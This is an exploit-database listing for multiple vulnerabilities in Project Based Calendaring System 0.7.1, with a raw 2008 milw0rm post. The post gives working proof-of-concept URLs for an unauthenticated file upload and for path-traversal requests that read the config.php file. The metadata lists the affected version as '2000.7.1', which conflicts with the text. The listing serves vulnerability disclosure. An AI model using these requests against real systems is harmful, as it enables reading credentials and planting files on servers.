header-logo
Suggest Exploit
vendor:
Project Based Calendaring System
by:
milw0rm.com
7.5
CVSS
HIGH
Remote File Upload, Remote File Disclosure, File Disclosure
N/A
CWE
Product Name: Project Based Calendaring System
Affected Version From: 2000.7.1
Affected Version To: 2000.7.1
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Project Based Calendaring System (PBCS) Version 0.7.1 Multiple Vulnerabilities

PBCS Version 0.7.1 is vulnerable to Remote File Upload, Remote File Disclosure, and File Disclosure. An attacker can exploit these vulnerabilities to upload malicious files, disclose sensitive information, and gain access to the system.

Mitigation:

Update to the latest version of PBCS
Source

Exploit-DB raw data:

Project Based Calendaring System (PBCS) Version 0.7.1 Multiple Vulnerabilities
Script: http://www.pbcs.org/pbcs_download.php
Poc : 
Hi str0ke Thanx To Posted but I Want Add Some Vulns In This Script
1- remote file upload
http://localhost/pbcs-0.7.1-1/src/yopy_upload.php
after upload you can get you file on
http://localhost/pbcs-0.7.1-1//tmp/uploads/name your file
2- remote file disclosure
http://localhost/pbcs-0.7.1-1/src/yopy_sync.php?download_file=0&filename=../config/config.php
3- file disclosure
/plugins/system-logger/print_logs.php?filename=../../config/config.php

# milw0rm.com [2008-04-30]